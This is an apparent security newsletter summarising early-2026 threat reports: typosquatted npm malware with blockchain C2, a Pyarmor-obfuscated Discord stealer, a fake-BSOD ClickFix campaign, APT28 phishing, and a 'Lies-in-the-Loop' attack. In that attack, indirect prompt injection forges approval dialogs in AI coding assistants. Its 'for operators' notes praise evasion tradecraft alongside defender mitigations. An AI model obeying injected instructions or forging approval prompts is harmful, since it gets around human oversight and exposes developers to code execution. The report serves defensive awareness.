ZeroDay Field Notes - When Package Managers Become Trojan Horses and AI Safety Gets Weaponized

UncleSp1d3r here. The first full week of 2026 brought yet another instance of a threat actor using a npm package for supply chain attacks. We've got npm packages deploying Discord RATs with blockchain-based C2, a Python infostealer using Pyarmor BCC mode to hide in plain sight, and researchers demonstrating how to weaponize AI safety features to achieve RCE. The connecting thread? Every trust relationship is an attack surface, and the best evasion techniques are the ones that look exactly like legitimate operations.

Let's dig in.

Supply Chain Double Feature: npm Goes Full Cyberpunk

NeoShadow: When Your C2 Lives on the Blockchain

Aikido Security documented what might be the most Neuromancer-adjacent supply chain attack I've seen: NeoShadow, a multi-stage campaign that uses typosquatted npm packages (viem-js, cyrpto, tailwin, supabase-js) to deliver a sophisticated backdoor with Ethereum smart contract queries for C2 configuration.

The attack chain is a pro move in evasion layering:

1. Typosquatting delivery: Packages masquerade as popular libraries with single-character typos
2. JavaScript anti-analysis: Obfuscated loaders detect sandbox environments and delay execution
3. Blockchain C2 config: Query Ethereum smart contract transaction memos for encrypted payloads (no DNS, no domains to sinkhole)
4. MSBuild LOLBIN execution: Abuse MSBuild.exe inline tasks to compile and execute C# payloads
5. APC injection: Inject into RuntimeBroker.exe for stealthy persistence
6. ChaCha20/Curve25519 crypto: Modern encryption for C2 comms and credential exfiltration

The payload targets cryptocurrency wallets and browser extensions specifically, with a hardcoded list of 170+ high-value domains. The C2 infrastructure resolves to metrics-flow[.]com and 80.78.22[.]206, but the real resilience comes from the blockchain dead-drop mechanism--you can't take down an Ethereum address. We’ve talked a bit about this before with a few other intrusions, so I anticipate this is just going to be the norm going forward, especially for cryptocurrency-oriented campaigns.

For operators, the tradecraft worth studying:

• Blockchain for C2 config: Immutable, censorship-resistant, and no DNS footprint. The downside is it's forever (hope you didn't leave any OPSEC mistakes in those transaction memos)
• MSBuild inline tasks: Clean LOLBIN technique that executes arbitrary C# without touching disk
• APC injection into signed binaries: RuntimeBroker.exe is a perfect target--always running, signed by Microsoft, low user visibility. Its not one of the usual tools listed on LOLBAS, so it might draw a bit less interest.

For defenders, the mitigations are multi-layered:

• Audit dependencies for the typosquatted packages (viem-js, cyrpto, tailwin, supabase-js)
• Monitor MSBuild.exe executions with inline task parameters (especially from non-developer directories)
• Detect APC injection into RuntimeBroker.exe (unusual thread creation patterns)
• Block metrics-flow[.]com and 80.78.22[.]206
• Monitor for Ethereum smart contract queries from build processes (yes, really)
• Hunt for mutex GlobalNSV2_8e4b1d indicating active infection

The Aikido analysis includes file hashes, Ethereum address, and full technical breakdown. This is cutting-edge supply chain stuff: blockchain for infrastructure, LOLBIN for execution, and crypto theft for making money.

NodeCordRAT: Discord Bot or Backdoor? Yes.

Speaking of npm, Zscaler ThreatLabz caught three more typosquatted Bitcoin libraries (bitcoin-main-lib, bitcoin-lib-js, bip40) delivering NodeCordRAT, a Discord-controlled remote access trojan that specifically targets developer machines.

The infection flow is clean:

1. Postinstall hook: Malicious code executes automatically when you npm install
2. PM2 persistence: Installs PM2 process manager and registers the RAT as a persistent Node.js app
3. Discord C2: Uses Discord API for command-and-control (free, encrypted, blends with legitimate dev traffic)
4. Credential harvesting: Exfiltrates Chrome passwords, MetaMask wallet data, API tokens, .env files
5. Host fingerprinting: Collects OS details, username, network config, and creates a Discord channel named after the victim's OS-UUID

The RAT's capabilities are standard but effective:

• Command execution via Discord messages
• File upload/download
• Screen capture
• Chrome/MetaMask credential theft
• Environment variable exfiltration (looking for AWS keys, database passwords, API tokens)

Using Discord for C2 is getting more popular. It's free, the API is easy to understand, and the traffic seems like regular developer chats. The PM2 persistence is a cool feature; it’s a solid tool that keeps the RAT running after reboots without needing registry keys or systemd services.

For operators:

• Discord as C2: Reliable, free, and it fits right into developer environments. Just keep Discord's terms of service in mind, plus they will work with law enforcement. I’m not a fan of misusing a legit service for pentests and Red Teaming, so think about emulation or use it for inspiration instead.
• PM2 for persistence: Legitimate Node.js process manager that blends with developer workflows
• Postinstall hooks: Auto-execution on npm install requires zero user interaction

For defenders:

• Remove bitcoin-main-lib, bitcoin-lib-js, bip40 from all projects and lockfiles immediately
• Hunt for PM2 processes associated with bip40 or unknown apps
• Block unauthorized Discord API traffic from build and dev environments
• Deploy SCA tools to catch typosquatted packages
• Rotate credentials stored in Chrome, MetaMask, and .env files on affected systems

The Zscaler report and corroborating coverage provide IOCs and behavioral indicators. Between NeoShadow and NodeCordRAT, npm is having a rough start to 2026.

Obfuscation Masterclass: VVS Stealer and Pyarmor BCC Mode

We've seen Python malware obfuscated with Pyarmor before, but VVS Stealer (also styled VVS $tealer) takes it further with Pyarmor BCC mode--a feature that converts Python functions to equivalent C functions compiled to machine code, then called by the obfuscated Python runtime.

The awesome team at Unit 42 did a fantastic analysis on reversing Pyarmor-protected malware. It's definitely worth a read just for the deobfuscation methods alone. The short version:

VVS Stealer is a Discord-targeting infostealer sold on Telegram since April 2025. It's distributed as a PyInstaller-packaged executable that:

1. Establishes persistence via Windows Startup folder
2. Harvests Discord tokens by decrypting LevelDB storage and using DPAPI to extract encryption keys from Local State files
3. Steals browser credentials from Chrome, Edge, Firefox, Brave, Opera, Vivaldi, Yandex
4. Hijacks Discord sessions by terminating the Discord client, injecting malicious JavaScript via Chrome DevTools Protocol, and intercepting network traffic for token theft
5. Exfiltrates via Discord webhooks (because why not use your victim's platform for your C2)

The Pyarmor protection uses:

• BCC mode: Python functions converted to C and compiled to native code stored in a separate ELF file
• AES-128-CTR encryption: For both bytecode and string constants, with keys extracted from the Pyarmor runtime DLL
• Obfuscated bytecode format: Custom marshaled bytecode with extra headers and encrypted sequences

The Unit 42 researchers successfully deobfuscated the sample by:

1. Extracting the Pyarmor runtime DLL and bytecode from the PyInstaller package
2. Locating AES keys and nonces in the runtime DLL (specific to the Pyarmor license number 007444)
3. Decrypting bytecode sequences and string constants
4. Mapping BCC function references back to their original Python logic

The result is a complete Python codebase that shows off the malware's abilities, C2 setup, and IOCs.

For operators:

• Pyarmor BCC mode is a strong obfuscation layer that defeats most static analysis and AV signatures. The downside is that it gets complicated--debugging and making changes are tougher when your code's compiled to C.
• Discord webhook exfiltration is trivial to implement and blends with legitimate traffic
• Chrome DevTools Protocol injection is an underutilized technique for hijacking Electron apps (Discord, VS Code, Slack, etc.)

For defenders:

• Monitor for Discord webhook creation and exfiltration patterns
• Detect PyInstaller executables with Pyarmor runtime components (specific DLL names and version strings)
• Block the documented webhook URLs (ptb.discord[.]com/api/webhooks/...)
• Hunt for modifications to Discord application directories and JavaScript injection
• Alert on suspicious files in the Windows Startup folder

The complete Unit 42 report has SHA-256 hashes, webhook URLs, and detailed deobfuscation steps. For malware analysts, it’s a case study on reverse engineering Pyarmor protection. For operators, it’s a guide to creating stealthy Python malware.

When LOLBINs and Social Engineering Collide: PHALT#BLYX

Securonix documented a campaign targeting European hospitality with a novel twist on the ClickFix technique: PHALT#BLYX uses fake Blue Screen of Death (BSOD) pages to trick users into executing PowerShell commands that deliver DCRat (DarkCrystal RAT) via MSBuild.exe.

The attack chain:

1. Phishing: Fake Booking.com emails with embedded links
2. Fake BSOD: Victim is redirected to a page displaying a fake BSOD with a "fix" button
3. ClickFix payload: The button copies a PowerShell command to your clipboard and tells you to paste it into the Windows Run dialog.
4. PowerShell dropper: Downloads and executes our old friend MSBuild.exe with a malicious inline task
5. MSBuild execution: Compiles and executes C# code that performs process hollowing on aspnet_compiler.exe
6. DCRat deployment: Full RAT features like keylogging, reverse shell, and running secondary payloads in memory (like cryptocurrency miners).
7. Persistence: .url file in Startup folder

The social engineering is solid--fake BSOD pages are effective because users are conditioned to panic at system errors. The technical execution is even better: MSBuild.exe is a signed Microsoft binary that's a perfect LOLBIN for malware delivery, and process hollowing of aspnet_compiler.exe bypasses basic EDR detection.

For operators:

• ClickFix + fake errors is an effective social engineering combo for non-technical users. Its effective and it makes for a great training opportunity in the after-action.
• MSBuild inline tasks execute arbitrary C# without touching disk (similar to NeoShadow)
• Process hollowing of signed binaries like aspnet_compiler.exe maintains stealth

For defenders:

• Educate users about ClickFix tactics (never paste script code into Run dialogs)
• Monitor MSBuild.exe executions from non-standard directories (%ProgramData%, %TEMP%)
• Detect process hollowing of aspnet_compiler.exe (memory allocation patterns, unexpected network activity)
• Alert on .url file creation in Startup folders
• Enable PowerShell Script Block Logging (Event ID 4104)

The Securonix report includes IOCs, C2 domains, and MITRE ATT&CK mappings. The campaign is ongoing and specifically targets hospitality, likely due to the industry's reliance on booking platforms and lower security awareness.

APT Corner: BlueDelta's Credential Harvesting Evolution

Recorded Future's Insikt Group documented the evolution of BlueDelta (GRU-linked APT28/Fancy Bear) credential-harvesting operations in 2025. The campaign sets up themed phishing sites (like Microsoft OWA, Google, and Sophos VPN) on free web services and tunneling networks to snag credentials and MFA codes from targets in government, energy, and think tanks.

The attack flow:

1. PDF-based phishing: Emails with fake account verification or password reset notices
2. Multi-stage redirection: PDF contains links that redirect through shorteners and free hosting services
3. Phishing portals: Fake login pages that mimic OWA, Google, or Sophos VPN
4. Credential capture: JavaScript-driven form submissions exfiltrate credentials and MFA codes
5. Disposable infrastructure: Free hosting (InfinityFree, Byet Internet Services), tunneling (ngrok, Webhook.site), URL shorteners (ShortURL)

The tradecraft evolution is notable:

• Free hosting/tunneling: Disposable infrastructure that's harder to attribute and doesn't require paid domains
• Multi-stage redirects: Breaks static analysis and makes blocking harder
• MFA code theft: Phishing portals capture one-time codes in real-time

For operators:

• Free web services provide operational flexibility and complicate attribution. Just like with Discord, keep the terms of service in mind and don’t mess it up for everyone.
• Multi-stage redirects evade URL scanning and make takedowns slower
• Culturally relevant lures (tax notices, government comms) improve success rates

For defenders:

• Block or tightly control access to free hosting/tunneling services (Webhook.site, ngrok, etc.)
• Monitor for PDF attachments with embedded links to shorteners
• Enforce phishing-resistant MFA (FIDO2, hardware tokens) instead of SMS/TOTP
• Alert on authentication from tunneling services and nonstandard ports
• Block known BlueDelta domains and IPs (documented in the Recorded Future report)

BlueDelta's shift from hacked routers in past campaigns to free web infrastructure shows they're evolving. The report has tons of IOCs and MITRE ATT&CK mappings that fit perfectly for SIEM integration. I guess I’ll have to rock my FancyBear t-shirt that KryptoKat got me as a nod to GRU getting called out in the report.

Bonus Round: Weaponizing AI Safety Features

Checkmarx documented a novel attack called Lies-in-the-Loop (LITL) that weaponizes Human-in-the-Loop (HITL) safety dialogs in AI coding assistants like Claude Code and Copilot Chat to achieve remote code execution.

The technique:

1. Indirect prompt injection: Attacker-controlled content (GitHub repo, web page) contains malicious instructions
2. HITL dialog forging: The AI assistant generates a safety dialog asking for user approval, but the dialog content is manipulated by the prompt injection
3. User approval: Victim approves the forged dialog, believing it's legitimate
4. RCE execution: The AI executes the attacker's command (file operations, network requests, arbitrary code)

The attack gets around the OWASP-recommended HITL safeguards by using the approval dialog as an injection point. Checkmarx showed PoCs that achieved RCE on both Claude Code and Copilot Chat. Anthropic and Microsoft both said these issues aren't vulnerabilities; they called them "informative" findings about the basic prompt injection problem.

For operators:

• Indirect prompt injection remains unsolved across the AI industry
• HITL dialog forging demonstrates that safety features can become attack surfaces
• AI coding assistants are high-value targets due to developer trust and privileged access

For defenders:

• Implement distinct UI styling for HITL dialogs to help users identify tampering
• Validate and sanitize all external input before rendering in conversations
• Run agents in sandboxed environments where feasible
• Educate users about LITL risks and encourage scrutiny of approval dialogs

Honestly, most of the fixes for this are aimed at AI tool developers. It’s kinda a mix between a ClickFix and a doppelganger attack, so the solutions for SOCs and security teams are pretty similar. The Checkmarx report has PoC demos and defensive tips. Even though vendors don’t see this as a CVE-worthy issue, it’s a real attack method that can hit actual deployments. As a hacker at heart, I’m excited about this new world of AI attacks. It’s like the link between social engineering and traditional exploitation, but now you’re social engineering the machine. It'll be interesting to watch and a pain to deal with.

Closing Thoughts: Every Trust Relationship Is an Attack Surface

I know I sound like a broken record (man, that reference shows my age), but this week's stories have a common theme: the best attacks take advantage of the stuff we trust completely. npm packages run as soon as you install them. Discord accounts stash tokens in easy-to-find spots. MSBuild.exe is a signed Microsoft file. AI coding helpers pop up safety dialogs that users just click through without thinking.

The basics of defense are still the same--check your dependencies, watch for strange behavior, stick to the least privilege, and educate users--but we need to sharpen our focus. You can’t just trust a package because it’s on npm or let a binary run just because Microsoft signed it. Context is key. Baselines are important. Behavioral detection is way more crucial than signatures.

For operators, the message is clear: the best tactics blend in with legit operations. Use blockchain for C2 infrastructure. Take advantage of LOLBINs for execution. Hit developers when they’re not paying attention. And use safety features as weapons when you can.

So, check your npm dependencies, look over your AI assistant permissions, and maybe spend some time tracking down MSBuild.exe executions from strange directories. The bad guys are already plotting for Q1 2026, and the attack surface keeps getting bigger.

Stay sharp. The supply chain never sleeps.

-- UncleSp1d3r

Hey there! Just a heads up: we’ve been trying out automated style checking with vale to make our content easier to read. But honestly, it’s starting to sound less like us and keeps getting flagged as AI-generated. So, we’re switching back to a more relaxed writing style. If using idioms and casual grammar makes it harder for anyone to understand, please let us know. We really want to keep this useful for everyone!